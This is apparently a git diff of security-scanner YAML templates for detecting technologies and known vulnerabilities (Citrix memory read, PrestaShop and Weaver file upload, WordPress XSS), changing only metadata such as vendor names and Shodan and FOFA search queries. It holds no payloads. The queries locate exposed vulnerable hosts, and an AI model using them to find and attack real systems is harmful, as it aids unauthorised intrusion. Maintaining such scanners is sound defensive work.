b/http/technologies/cowboy-detect.yaml index 8e9c23297a..fc77dc89b1 100644 --- a/http/technologies/cowboy-detect.yaml +++ b/http/technologies/cowboy-detect.yaml @@ -8,8 +8,8 @@ info: reference: - https://github.com/ninenines/cowboy metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: "cowboy" tags: tech,cowboy,detect diff --git a/http/technologies/craftercms-detect.yaml b/http/technologies/craftercms-detect.yaml index 7389a1e9c3..8d7fd38f02 100644 --- a/http/technologies/craftercms-detect.yaml +++ b/http/technologies/craftercms-detect.yaml @@ -1,19 +1,19 @@ id: craftercms-detect -info: - name: CrafterCMS - Detect - author: righettod - severity: info - description: | - CrafterCMS was detected. - reference: - - https://craftercms.org/ - metadata: - max-request: 1 - verified: true - shodan-query: http.title:"craftercms" - tags: tech,craftercms,detect - +info: + name: CrafterCMS - Detect + author: righettod + severity: info + description: | + CrafterCMS was detected. + reference: + - https://craftercms.org/ + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"craftercms" + tags: tech,craftercms,detect + http: - method: GET path: diff --git a/http/technologies/erxes-detect.yaml b/http/technologies/erxes-detect.yaml index ba864b7aeb..62372781a2 100644 --- a/http/technologies/erxes-detect.yaml +++ b/http/technologies/erxes-detect.yaml @@ -7,6 +7,10 @@ info: metadata: max-request: 1 shodan-query: http.title:"erxes" + product: erxes + vendor: erxes + fofa-query: title="erxes" + google-query: intitle:"erxes" tags: tech,erxes http: diff --git a/http/technologies/harbor-detect.yaml b/http/technologies/harbor-detect.yaml index 00547129c7..c81217c93c 100644 --- a/http/technologies/harbor-detect.yaml +++ b/http/technologies/harbor-detect.yaml @@ -11,6 +11,9 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:657337228 + product: harbor + vendor: linuxfoundation + fofa-query: icon_hash=657337228 tags: tech,harbor http: diff --git a/http/technologies/hikvision-detect.yaml b/http/technologies/hikvision-detect.yaml index dbfcee8a82..db5524b080 100644 --- a/http/technologies/hikvision-detect.yaml +++ b/http/technologies/hikvision-detect.yaml @@ -8,6 +8,9 @@ info: verified: true max-request: 2 shodan-query: http.favicon.hash:999357577 + product: ds-2cd2026g2-iu\/sl_firmware + vendor: hikvision + fofa-query: icon_hash=999357577 tags: tech,hikvision http: diff --git a/http/technologies/jenkins-detect.yaml b/http/technologies/jenkins-detect.yaml index cfff834f0b..77d441dddb 100644 --- a/http/technologies/jenkins-detect.yaml +++ b/http/technologies/jenkins-detect.yaml @@ -14,8 +14,12 @@ info: max-request: 2 vendor: jenkins product: jenkins - shodan-query: http.favicon.hash:81586312 + shodan-query: + - http.favicon.hash:81586312 + - cpe:"cpe:2.3:a:jenkins:jenkins" + - product:"jenkins" category: devops + fofa-query: icon_hash=81586312 tags: tech,jenkins,detect http: diff --git a/http/technologies/jira-detect.yaml b/http/technologies/jira-detect.yaml index ae9adaad03..c3983e285d 100644 --- a/http/technologies/jira-detect.yaml +++ b/http/technologies/jira-detect.yaml @@ -15,6 +15,10 @@ info: vendor: atlassian product: jira category: productivity + shodan-query: + - http.component:"atlassian jira" + - http.component:"atlassian confluence" + - cpe:"cpe:2.3:a:atlassian:jira" tags: tech,panel,jira,atlassian http: diff --git a/http/technologies/meilisearch-detect.yaml b/http/technologies/meilisearch-detect.yaml index e5593da0b4..f755b209e2 100644 --- a/http/technologies/meilisearch-detect.yaml +++ b/http/technologies/meilisearch-detect.yaml @@ -1,19 +1,19 @@ id: meilisearch-detect -info: - name: Meilisearch - Detect - author: userdehghani - severity: info - description: | - An open-source, blazingly fast, and hyper-relevant search engine that will improve your search experience. - reference: - - https://www.meilisearch.com/ - metadata: - verified: true - max-request: 1 - fofa-query: app="meilisearch" - tags: meilisearch,detect,tech - +info: + name: Meilisearch - Detect + author: userdehghani + severity: info + description: | + An open-source, blazingly fast, and hyper-relevant search engine that will improve your search experience. + reference: + - https://www.meilisearch.com/ + metadata: + verified: true + max-request: 1 + fofa-query: app="meilisearch" + tags: meilisearch,detect,tech + http: - method: GET path: diff --git a/http/technologies/microfocus-iprint-detect.yaml b/http/technologies/microfocus-iprint-detect.yaml index bde012dc46..be4ccdad76 100644 --- a/http/technologies/microfocus-iprint-detect.yaml +++ b/http/technologies/microfocus-iprint-detect.yaml @@ -9,8 +9,8 @@ info: reference: - https://www.opentext.com/products/enterprise-server metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"Micro Focus iPrint Appliance" tags: tech,microfocus,detect diff --git a/http/technologies/microweber-detect.yaml b/http/technologies/microweber-detect.yaml index 52947ee5a2..25ae799b08 100644 --- a/http/technologies/microweber-detect.yaml +++ b/http/technologies/microweber-detect.yaml @@ -8,7 +8,14 @@ info: - https://github.com/microweber/microweber metadata: max-request: 1 - shodan-query: http.favicon.hash:780351152 + shodan-query: + - http.favicon.hash:780351152 + - http.html:"microweber" + product: microweber + vendor: microweber + fofa-query: + - icon_hash=780351152 + - body="microweber" tags: tech,microweber,oss http: diff --git a/http/technologies/monstracms-detect.yaml b/http/technologies/monstracms-detect.yaml index 9509397862..b50b9c16d2 100644 --- a/http/technologies/monstracms-detect.yaml +++ b/http/technologies/monstracms-detect.yaml @@ -10,6 +10,9 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:419828698 + product: monstra_cms + vendor: monstra + fofa-query: icon_hash=419828698 tags: tech,monstra,monstracms http: diff --git a/http/technologies/piwigo-detect.yaml b/http/technologies/piwigo-detect.yaml index 556fde95b3..8a08d33bc4 100644 --- a/http/technologies/piwigo-detect.yaml +++ b/http/technologies/piwigo-detect.yaml @@ -6,7 +6,13 @@ info: severity: info metadata: max-request: 1 - fofa-query: title="piwigo" + fofa-query: + - title="piwigo" + - icon_hash=540706145 + product: piwigo + vendor: piwigo + google-query: powered by piwigo + shodan-query: http.favicon.hash:540706145 tags: piwigo,tech http: diff --git a/http/technologies/privatebin-detect.yaml b/http/technologies/privatebin-detect.yaml index cd31f07925..298fd9b837 100644 --- a/http/technologies/privatebin-detect.yaml +++ b/http/technologies/privatebin-detect.yaml @@ -1,19 +1,19 @@ id: privatebin-detect -info: - name: PrivateBin - Detect - author: righettod - severity: info - description: | - PrivateBin was detected. - reference: - - https://privatebin.info/ - metadata: - max-request: 1 - verified: true - shodan-query: title:"PrivateBin" - tags: tech,privatebin,detect - +info: + name: PrivateBin - Detect + author: righettod + severity: info + description: | + PrivateBin was detected. + reference: + - https://privatebin.info/ + metadata: + verified: true + max-request: 1 + shodan-query: title:"PrivateBin" + tags: tech,privatebin,detect + http: - method: GET path: diff --git a/http/technologies/sap/sap-netweaver-detect.yaml b/http/technologies/sap/sap-netweaver-detect.yaml index cfce8f3d35..34c8cdd431 100644 --- a/http/technologies/sap/sap-netweaver-detect.yaml +++ b/http/technologies/sap/sap-netweaver-detect.yaml @@ -10,7 +10,11 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-266008933 - fofa-query: "sap-server:" + fofa-query: + - "sap-server:" + - icon_hash=-266008933 + product: content_server + vendor: sap tags: sap,webserver,tech,detect http: diff --git a/http/technologies/sap/sap-web-dispatcher-admin-portal.yaml b/http/technologies/sap/sap-web-dispatcher-admin-portal.yaml index b3f3ad6f2a..b34657d083 100644 --- a/http/technologies/sap/sap-web-dispatcher-admin-portal.yaml +++ b/http/technologies/sap/sap-web-dispatcher-admin-portal.yaml @@ -8,6 +8,9 @@ info: metadata: max-request: 1 shodan-query: http.favicon.hash:-266008933 + product: content_server + vendor: sap + fofa-query: icon_hash=-266008933 tags: sap,webserver,proxy,tech http: diff --git a/http/technologies/simplesamlphp-detect.yaml b/http/technologies/simplesamlphp-detect.yaml index a9bfcaffe4..04fc3f0799 100644 --- a/http/technologies/simplesamlphp-detect.yaml +++ b/http/technologies/simplesamlphp-detect.yaml @@ -9,9 +9,9 @@ info: reference: - https://simplesamlphp.org/ metadata: - max-request: 1 verified: true - shodan-query: http.title:"SimpleSAMLphp installation page" + max-request: 2 + shodan-query: "http.title:\"SimpleSAMLphp installation page\"" tags: tech,simplesamlphp,detect http: diff --git a/http/technologies/sparklighter-detect.yaml b/http/technologies/sparklighter-detect.yaml index 6296410e7b..a51273d57a 100644 --- a/http/technologies/sparklighter-detect.yaml +++ b/http/technologies/sparklighter-detect.yaml @@ -14,7 +14,14 @@ info: vendor: apache product: spark category: productivity - tags: tech,lighter,spark,detect + shodan-query: + - http.html:"/apps/imt/html/" + - http.title:"spark master at" + fofa-query: + - title="spark master at" + - body="/apps/imt/html/" + google-query: intitle:"spark master at" + tags: tech,lighter,spark,detect,apache http: - method: GET diff --git a/http/technologies/tibco-spotfire-services-detect.yaml b/http/technologies/tibco-spotfire-services-detect.yaml index 9094409f3e..4d5eccfeeb 100644 --- a/http/technologies/tibco-spotfire-services-detect.yaml +++ b/http/technologies/tibco-spotfire-services-detect.yaml @@ -9,8 +9,8 @@ info: reference: - https://docs.tibco.com/products/tibco-spotfire-statistics-services metadata: - max-request: 4 verified: true + max-request: 4 shodan-query: "TIBCO Spotfire Server" tags: tech,tibco,detect diff --git a/http/technologies/uni-gui-framework.yaml b/http/technologies/uni-gui-framework.yaml index b004c0dc86..54a9ad6257 100644 --- a/http/technologies/uni-gui-framework.yaml +++ b/http/technologies/uni-gui-framework.yaml @@ -1,17 +1,17 @@ id: uni-gui-framework -info: - name: UniGUI Framework - Detect - author: serrapa - severity: info - description: | - Checks for the presence of UniGUI framework and extracts its version along with the Sencha Ext JS version. - metadata: - verified: true - max-request: 1 - shodan-query: http.title:"UniGUI" - tags: tech,unigui - +info: + name: UniGUI Framework - Detect + author: serrapa + severity: info + description: | + Checks for the presence of UniGUI framework and extracts its version along with the Sencha Ext JS version. + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"UniGUI" + tags: tech,unigui + http: - method: GET path: diff --git a/http/technologies/wordpress-detect.yaml b/http/technologies/wordpress-detect.yaml index 1967dd8e96..7b6a861093 100644 --- a/http/technologies/wordpress-detect.yaml +++ b/http/technologies/wordpress-detect.yaml @@ -11,7 +11,10 @@ info: max-request: 4 vendor: wordpress product: wordpress - shodan-query: http.component:"WordPress" + shodan-query: + - http.component:"WordPress" + - http.component:"wordpress" + - cpe:"cpe:2.3:a:wordpress:wordpress" category: cms tags: tech,wordpress,cms,wp diff --git a/http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml b/http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml index 802b5c5f54..5ae5124e3b 100644 --- a/http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml +++ b/http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml @@ -1,19 +1,19 @@ id: wp-bricks-builder-theme -info: - name: WordPress Bricks Builder Theme Version - author: Anonymous - severity: info - description: | - - Checks for Bricks Builder Theme versions. - reference: - - https://0day.today/exploit/description/39489 - metadata: - publicwww-query: "/wp-content/themes/bricks/" - verified: true - max-request: 1 - tags: wordpress,theme,wp-theme,wp,bricks - +info: + name: WordPress Bricks Builder Theme Version + author: Anonymous + severity: info + description: | + - Checks for Bricks Builder Theme versions. + reference: + - https://0day.today/exploit/description/39489 + metadata: + verified: true + max-request: 1 + publicwww-query: "/wp-content/themes/bricks/" + tags: wordpress,theme,wp-theme,wp,bricks + http: - method: GET path: diff --git a/http/technologies/yourls-detect.yaml b/http/technologies/yourls-detect.yaml index 4704c9f7c3..4412d10ba7 100644 --- a/http/technologies/yourls-detect.yaml +++ b/http/technologies/yourls-detect.yaml @@ -9,8 +9,8 @@ info: reference: - https://github.com/YOURLS/YOURLS metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Your Own URL Shortener" fofa-query: title="Your Own URL Shortener" tags: tech,yourls diff --git a/http/token-spray/api-mailchimp.yaml b/http/token-spray/api-mailchimp.yaml index e4b8320148..b7fdf5206c 100644 --- a/http/token-spray/api-mailchimp.yaml +++ b/http/token-spray/api-mailchimp.yaml @@ -8,7 +8,7 @@ info: - https://mailchimp.com/developer/transactional/docs/smtp-integration/#credentials-and-configuration metadata: max-request: 1 - tags: token-spray,mailchimp + tags: token-spray,mailchimp,tcp self-contained: true tcp: diff --git a/http/token-spray/api-sendgrid.yaml b/http/token-spray/api-sendgrid.yaml index 3bf3692649..640c4c64ac 100644 --- a/http/token-spray/api-sendgrid.yaml +++ b/http/token-spray/api-sendgrid.yaml @@ -8,7 +8,7 @@ info: - https://docs.sendgrid.com/for-developers/sending-email/getting-started-smtp metadata: max-request: 1 - tags: token-spray,sendgrid + tags: token-spray,sendgrid,tcp self-contained: true tcp: diff --git a/http/token-spray/api-travisci.yaml b/http/token-spray/api-travisci.yaml index 1a66071c7a..d0a7a4cace 100644 --- a/http/token-spray/api-travisci.yaml +++ b/http/token-spray/api-travisci.yaml @@ -6,9 +6,9 @@ info: severity: info reference: - https://developer.travis-ci.com/ - tags: token-spray,travis metadata: max-request: 1 + tags: token-spray,travis self-contained: true http: diff --git a/http/vulnerabilities/backdoor/cisco-implant-detect.yaml b/http/vulnerabilities/backdoor/cisco-implant-detect.yaml index 71631aa5e0..a7a392e134 100644 --- a/http/vulnerabilities/backdoor/cisco-implant-detect.yaml +++ b/http/vulnerabilities/backdoor/cisco-implant-detect.yaml @@ -17,6 +17,8 @@ info: verified: true max-request: 2 shodan-query: http.html_hash:1076109428 + product: ios_xe + vendor: cisco tags: backdoor,cisco,ios,kev http: diff --git a/http/vulnerabilities/citrix/citrix-oob-memory-read.yaml b/http/vulnerabilities/citrix/citrix-oob-memory-read.yaml index ecd360c0fc..2c43e96099 100644 --- a/http/vulnerabilities/citrix/citrix-oob-memory-read.yaml +++ b/http/vulnerabilities/citrix/citrix-oob-memory-read.yaml @@ -6,14 +6,14 @@ info: severity: critical description: | The vulnerability would enable an attacker to remotely obtain sensitive information from a NetScaler appliance configured as a Gateway or AAA virtual server via a very commonly connected Web interface, and without requiring authentication. This bug is nearly identical to the Citrix Bleed vulnerability (CVE-2023-4966), except it is less likely to return highly sensitive information to an attacker. - remediation: Update to version 13.1-51.15 or later impact: The vulnerability allows an attacker to recover potentially sensitive data from memory. Although in most cases nothing of value is returned, we have observed instances where POST request bodies are leaked. + remediation: Update to version 13.1-51.15 or later reference: - https://bishopfox.com/blog/netscaler-adc-and-gateway-advisory metadata: - shodan-query: http.favicon.hash:-1292923998,-1166125415 verified: true max-request: 1 + shodan-query: http.favicon.hash:-1292923998,-1166125415 tags: citrix,netscaller,gateway,oob http: diff --git a/http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml b/http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml index 35aec42c58..bdb1cfdc0d 100644 --- a/http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml +++ b/http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml @@ -9,8 +9,8 @@ info: - https://tripla.dk/2020/03/26/multiple-vulnerabilities-in-nodejs-ecstatic-http-server-http-party/ metadata: verified: true - shodan-query: 'server: "ecstatic"' max-request: 1 + shodan-query: 'server: "ecstatic"' tags: node,js,listing,ecstatic http: diff --git a/http/vulnerabilities/esafenet/esafenet-mysql-fileread.yaml b/http/vulnerabilities/esafenet/esafenet-mysql-fileread.yaml index 560819aeb7..67c27ee937 100644 --- a/http/vulnerabilities/esafenet/esafenet-mysql-fileread.yaml +++ b/http/vulnerabilities/esafenet/esafenet-mysql-fileread.yaml @@ -10,6 +10,8 @@ info: verified: true max-request: 1 fofa-query: title="电子文档安全管理系统" + product: electronic_document_security_management_system + vendor: esafenet tags: esafenet,lfi,mysql http: diff --git a/http/vulnerabilities/huatian/huatian-oa-sqli.yaml b/http/vulnerabilities/huatian/huatian-oa-sqli.yaml index 37bed4c845..39f8e0c6ae 100644 --- a/http/vulnerabilities/huatian/huatian-oa-sqli.yaml +++ b/http/vulnerabilities/huatian/huatian-oa-sqli.yaml @@ -10,7 +10,8 @@ info: - https://blog.csdn.net/qq_41617034/article/details/124305120 metadata: verified: true - fofa-query: app="华天动力-OA8000" + max-request: 1 + fofa-query: "app=\"华天动力-OA8000\"" tags: huatian,oa,sqli http: diff --git a/http/vulnerabilities/jorani/jorani-benjamin-xss.yaml b/http/vulnerabilities/jorani/jorani-benjamin-xss.yaml index 211516606a..4714902deb 100644 --- a/http/vulnerabilities/jorani/jorani-benjamin-xss.yaml +++ b/http/vulnerabilities/jorani/jorani-benjamin-xss.yaml @@ -12,6 +12,9 @@ info: verified: true max-request: 2 shodan-query: http.favicon.hash:-2032163853 + product: jorani + vendor: jorani + fofa-query: icon_hash=-2032163853 tags: packetstorm,jorani,benjamin,xss http: diff --git a/http/vulnerabilities/kkfileview-ssrf.yaml b/http/vulnerabilities/kkfileview-ssrf.yaml index 2ab25a38d4..81498d7d44 100644 --- a/http/vulnerabilities/kkfileview-ssrf.yaml +++ b/http/vulnerabilities/kkfileview-ssrf.yaml @@ -16,8 +16,13 @@ info: max-request: 1 vendor: keking product: kkfileview - shodan-query: http.html:"kkFileView" - fofa-query: app="kkFileView" + shodan-query: + - http.html:"kkFileView" + - http.html:"kkfileview" + fofa-query: + - app="kkFileView" + - app="kkfileview" + - body="kkfileview" tags: ssrf,kkfileview,keking http: diff --git a/http/vulnerabilities/other/array-vpn-lfi.yaml b/http/vulnerabilities/other/array-vpn-lfi.yaml index c8dc14a1bb..3f4fe18691 100644 --- a/http/vulnerabilities/other/array-vpn-lfi.yaml +++ b/http/vulnerabilities/other/array-vpn-lfi.yaml @@ -9,9 +9,9 @@ info: reference: - https://github.com/wy876/POC/blob/main/Array%20VPN%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md metadata: - fofa-query: product="Array-VPN" - max-request: 1 verified: true + max-request: 1 + fofa-query: product="Array-VPN" tags: lfi,vpn,arrayvpn http: diff --git a/http/vulnerabilities/other/cerio-dt-rce.yaml b/http/vulnerabilities/other/cerio-dt-rce.yaml index 098c30ca5d..aa7d6747cb 100644 --- a/http/vulnerabilities/other/cerio-dt-rce.yaml +++ b/http/vulnerabilities/other/cerio-dt-rce.yaml @@ -11,8 +11,8 @@ info: - https://github.com/tanjiti/sec_profile - https://github.com/wy876/POC/blob/main/D-Link_DAR-8000%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E(CVE-2023-4542).md metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: title="DT-100G-N" || title="DT-300N" || title="DT-100G" || title="AMR-3204G" || title="WMR-200N" tags: cerio,rce diff --git a/http/vulnerabilities/other/easycvr-info-leak.yaml b/http/vulnerabilities/other/easycvr-info-leak.yaml index 5ff933c1fa..23ee4528d7 100644 --- a/http/vulnerabilities/other/easycvr-info-leak.yaml +++ b/http/vulnerabilities/other/easycvr-info-leak.yaml @@ -10,9 +10,9 @@ info: - https://github.com/wy876/POC/blob/main/EasyCVR%20%E8%A7%86%E9%A2%91%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%E5%AD%98%E5%9C%A8%E7%94%A8%E6%88%B7%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2.md metadata: verified: true - fofa-query: title="EasyCVR" + max-request: 2 + fofa-query: "title=\"EasyCVR\"" tags: unauth,easycvr,misconfig - flow: http(1) && http(2) http: diff --git a/http/vulnerabilities/other/microweber-xss.yaml b/http/vulnerabilities/other/microweber-xss.yaml index abe1afde09..29cfbebd11 100644 --- a/http/vulnerabilities/other/microweber-xss.yaml +++ b/http/vulnerabilities/other/microweber-xss.yaml @@ -14,7 +14,14 @@ info: cwe-id: CWE-79 metadata: max-request: 1 - shodan-query: http.favicon.hash:780351152 + shodan-query: + - http.favicon.hash:780351152 + - http.html:"microweber" + product: microweber + vendor: microweber + fofa-query: + - icon_hash=780351152 + - body="microweber" tags: microweber,xss,oss http: diff --git a/http/vulnerabilities/other/pmb-xss.yaml b/http/vulnerabilities/other/pmb-xss.yaml index a52764e0f3..1477a6faa4 100644 --- a/http/vulnerabilities/other/pmb-xss.yaml +++ b/http/vulnerabilities/other/pmb-xss.yaml @@ -15,7 +15,14 @@ info: metadata: verified: true max-request: 1 - shodan-query: http.favicon.hash:1469328760 + shodan-query: + - http.favicon.hash:1469328760 + - http.html:"pmb group" + product: pmb + vendor: sigb + fofa-query: + - icon_hash=1469328760 + - body="pmb group" tags: xss,pmb,cms http: diff --git a/http/vulnerabilities/other/quick-cms-sqli.yaml b/http/vulnerabilities/other/quick-cms-sqli.yaml index d21270d655..bd33cca147 100644 --- a/http/vulnerabilities/other/quick-cms-sqli.yaml +++ b/http/vulnerabilities/other/quick-cms-sqli.yaml @@ -10,8 +10,8 @@ info: - https://packetstormsecurity.com/files/177657/Quick.CMS-6.7-SQL-Injection.html - https://www.exploit-db.com/exploits/51910 metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: body="Quick.Cms v6.7" tags: packetstorm,quickcms,sqli,cms diff --git a/http/vulnerabilities/other/tendat-credential.yaml b/http/vulnerabilities/other/tendat-credential.yaml index 3fbbda7fe7..9373ba2c4d 100644 --- a/http/vulnerabilities/other/tendat-credential.yaml +++ b/http/vulnerabilities/other/tendat-credential.yaml @@ -10,7 +10,8 @@ info: - https://github.com/wy876/POC/blob/main/Tenda%E8%B7%AF%E7%94%B1%E5%99%A8%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2.md metadata: verified: true - fofa-query: title="Tenda | LOGIN" && country="CN" + max-request: 1 + fofa-query: "title=\"Tenda | LOGIN\" && country=\"CN\"" tags: tendat,exposure,config http: diff --git a/http/vulnerabilities/other/tikiwiki-xss.yaml b/http/vulnerabilities/other/tikiwiki-xss.yaml index b44bbe9ed9..0907454346 100644 --- a/http/vulnerabilities/other/tikiwiki-xss.yaml +++ b/http/vulnerabilities/other/tikiwiki-xss.yaml @@ -12,6 +12,9 @@ info: verified: true max-request: 2 shodan-query: http.html:"tiki wiki" + product: tikiwiki_cms\/groupware + vendor: tiki + fofa-query: body="tiki wiki" tags: edb,xss,tikiwiki,packetstorm,acketstorm http: diff --git a/http/vulnerabilities/prestashop/prestashop-blocktestimonial-file-upload.yaml b/http/vulnerabilities/prestashop/prestashop-blocktestimonial-file-upload.yaml index aea6f3692e..6ff80954f3 100644 --- a/http/vulnerabilities/prestashop/prestashop-blocktestimonial-file-upload.yaml +++ b/http/vulnerabilities/prestashop/prestashop-blocktestimonial-file-upload.yaml @@ -12,8 +12,9 @@ info: max-request: 2 framework: prestashop shodan-query: "http.component:\"prestashop\"" + product: ap_pagebuilder + vendor: apollotheme tags: intrusive,file-upload,blocktestimonial,prestashop - variables: filename: '{{rand_base(7, "abc")}}' data: '{{rand_base(6, "abc")}}' diff --git a/http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml b/http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml index 3972c20e34..6c809f05d2 100644 --- a/http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml +++ b/http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml @@ -8,12 +8,13 @@ info: - https://www.openservis.cz/prestashop-blog/nejcastejsi-utoky-v-roce-2023-seznam-deravych-modulu-nemate-nejaky-z-nich-na-e-shopu-i-vy/ - https://dh42.com/blog/prestashop-security/ metadata: - framework: prestashop - shodan-query: http.component:"prestashop" verified: true - max-request: 1 + max-request: 2 + framework: prestashop + shodan-query: "http.component:\"prestashop\"" + product: ap_pagebuilder + vendor: apollotheme tags: intrusive,file-upload,cartabandonmentpro,prestashop - variables: filename: '{{rand_base(7, "abc")}}' title: '{{rand_base(7, "abc")}}' diff --git a/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml b/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml index 4cb8368e6a..aa9ba34bb3 100755 --- a/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml +++ b/http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 3 fofa-query: app="泛微-EOffice" - tags: weaver,e-office,oa,intrusive,rce,intrusive,fileupload + tags: weaver,e-office,oa,intrusive,rce,fileupload variables: filename: "{{to_lower(rand_base(5))}}" diff --git a/http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml b/http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml index fbf534f6bd..135ba73734 100644 --- a/http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml +++ b/http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml @@ -10,7 +10,7 @@ info: cvss-score: 5.3 cwe-id: CWE-200 metadata: - max-request: 30 + max-request: 32 tags: wordpress,backup http: diff --git a/http/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml b/http/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml index d96109c385..e4ee7e788f 100644 --- a/http/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml +++ b/http/vulnerabilities/wordpress/wordpress-wordfence-xss.yaml @@ -10,7 +10,7 @@ info: cvss-score: 5.4 cwe-id: CWE-80 metadata: - max-request: 1 + max-request: 2 tags: wordpress,wp-plugin,xss,wordfence flow: http(1) && http(2) diff --git a/http/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml b/http/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml index 0775781c9c..0e2e13a451 100644 --- a/http/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml +++ b/http/vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml @@ -14,7 +14,7 @@ info: cvss-score: 5.4 cwe-id: CWE-80 metadata: - max-request: 1 + max-request: 2 tags: wordpress,xss,wp,wpscan,intrusive flow: http(1) && http(2) diff --git a/http/vulnerabilities/wordpress/wp-ambience-xss.yaml b/http/vulnerabilities/wordpress/wp-ambience-xss.yaml index 0a87565389..e7b5b216ab 100644 --- a/http/vulnerabilities/wordpress/wp-ambience-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-ambience-xss.yaml @@ -14,7 +14,7 @@ info: cvss-score: 5.4 cwe-id: CWE-80 metadata: - max-request: 1 + max-request: 2 tags: wp-plugin,wp,edb,wpscan,wordpress,xss flow: http(1) && http(2) diff --git a/http/vulnerabilities/wordpress/wp-custom-tables-xss.yaml b/http/vulnerabilities/wordpress/wp-custom-tables-xss.yaml index 92b5714c5b..6fa48097da 100644 --- a/http/vulnerabilities/wordpress/wp-custom-tables-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-custom-tables-xss.yaml @@ -13,7 +13,7 @@ info: cvss-score: 7.2 cwe-id: CWE-79 metadata: - max-request: 1 + max-request: 2 tags: wpscan,wordpress,xss,wp-plugin flow: http(1) && http(2) diff --git a/http/vulnerabilities/wordpress/wp-finder-xss.yaml b/http/vulnerabilities/wordpress/wp-finder-xss.yaml index c234442498..322ce7a569 100644 --- a/http/vulnerabilities/wordpress/wp-finder-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-finder-xss.yaml @@ -12,7 +12,7 @@ info: cvss-score: 7.2 cwe-id: CWE-79 metadata: - max-request: 1 + max-request: 2 tags: xss,wp-plugin,packetstorm,wordpress flow: http(1) && http(2) diff --git a/http/vulnerabilities/wordpress/wp-flagem-xss.yaml b/http/vulnerabilities/wordpress/wp-flagem-xss.yaml index 8674f3db13..00c20bfa3d 100644 --- a/http/vulnerabilities/wordpress/wp-flagem-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-flagem-xss.yaml @@ -13,7 +13,7 @@ info: cvss-score: 7.2 cwe-id: CWE-79 metadata: - max-request: 1 + max-request: 2 tags: wordpress,xss,wp-plugin,edb flow: http(1) && http(2) diff --git a/http/vulnerabilities/wordpress/wp-knews-xss.yaml b/http/vulnerabilities/wordpress/wp-knews-xss.yaml index 8e71f846a2..62b6671448 100644 --- a/http/vulnerabilities/wordpress/wp-knews-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-knews-xss.yaml @@ -13,7 +13,7 @@ info: cvss-score: 7.2 cwe-id: CWE-79 metadata: - max-request: 1 + max-request: 2 tags: wordpress,xss,wp-plugin flow: http(1) && http(2) diff --git a/http/vulnerabilities/wordpress/wp-nextgen-xss.yaml b/http/vulnerabilities/wordpress/wp-nextgen-xss.yaml index 458876ca6b..bddb84aacb 100644 --- a/http/vulnerabilities/wordpress/wp-nextgen-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-nextgen-xss.yaml @@ -13,7 +13,7 @@ info: cvss-score: 7.2 cwe-id: CWE-79 metadata: - max-request: 1 + max-request: 2 tags: wp-plugin,edb,wordpress,xss flow: http(1) && http(2) diff --git a/http/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml b/http/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml index da31152e66..3d8caaaea1 100644 --- a/http/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml @@ -13,7 +13,7 @@ info: cvss-score: 7.2 cwe-id: CWE-79 metadata: - max-request: 1 + max-request: 2 tags: xss,wp-plugin,edb,wordpress flow: http(1) && http(2) diff --git a/http/vulnerabilities/wordpress/wp-securimage-xss.yaml b/http/vulnerabilities/wordpress/wp-securimage-xss.yaml index 07d7a66adf..76aae56907 100644 --- a/http/vulnerabilities/wordpress/wp-securimage-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-securimage-xss.yaml @@ -13,7 +13,7 @@ info: cvss-score: 7.2 cwe-id: CWE-79 metadata: - max-request: 1 + max-request: 2 tags: edb,wordpress,xss,wp-plugin flow: http(1) && http(2) diff --git a/http/vulnerabilities/wordpress/wp-slideshow-xss.yaml 